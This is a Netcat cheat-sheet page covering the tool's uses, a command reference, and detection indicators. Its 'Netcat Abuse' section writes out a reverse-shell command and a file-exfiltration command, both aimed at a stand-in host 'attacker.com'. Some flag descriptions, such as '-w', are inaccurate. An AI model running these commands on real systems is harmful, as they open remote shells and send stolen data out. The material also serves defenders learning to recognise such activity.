Netcat - consoletornado.com

## What is Netcat? - Multipurpose CLI networking tool. - Can create clients and servers from the terminal. - Can read/write data via TCP/UDP. --- ## Use Cases - Port Scanning - Service Discovery - File Transfer - Reverse Shell - Network Debugging --- ## Netcat Abuse ### Reverse Shells Can use netcat to connect back from a compromised host to their own nc server allowing for a remote shell. ```bash # Attacker's Machine nc -lvp 4444 # Victims Machine nc attacker.com 4444 -e /bin/bash ``` **Note:** This may bypass firewall rules. If there are only inbound rules, it won't affect the connection as the connection is initiated by the victim. ### Data Exfiltration Can exfiltrate stolen, sensitive data via netcat's file transfer capabilities. ```bash # Sending Files nc attacker.com 4444 < senstive_files.zip # Receiving Files nc -lvp 4444 > sensitive_files.zip ``` --- ## IOC's ### Process Activity - Command Line of `nc` or `ncat` ### Network Activity - Outbound connections to ports: - 4444 ### File Reputation - Known `nc` binay hashes --- ## Commands - `nc -h` - Show help and options - `nc <host> <port>` - Connect to a host and port - `nc -l -p <port>` - Listen on a specific port - `nc -nlvp <port>` - Listen for all types of connections - `nc -l -p <p> > file` - Receive a file - `nc -w 3 <host> <port> < file` - Send a file - `nc -l` - Listen without time limit - `nc -v -n` - Verbose mode without DNS resolution - `nc -u -l -p <port>` - Listen for UDP on a specific port - `nc -u <host> <port>` - Connect UDP to a host and port - `nc -e /bin/sh` - Execute a shell after connection - `nc -z <host> <port>` - Check the status of ports - `nc -s <source>` - Specify a source address - `nc -c <command>` - Execute a command after connection - `nc -r` - Enable random port selection - `nc -k` - Accept multiple connections - `nc -i <seconds>` - Set a time interval - `nc -X <proxy>` - Set a proxy per connection - `nc -n` - Disable DNS resolution - `nc -o <file>` - Redirect output to a file - `nc -p <port>` - Specify a port to connect - `nc -v` - Verbose mode - `nc -w <seconds>` - Verbose mode with wait time - `nc -k` - Listen and accept multiple connections - `nc -X <type>` - Set the type of proxy - `nc -L host:port` - Connect through a tunnel - `nc -u -p <port>` - Specify a UDP port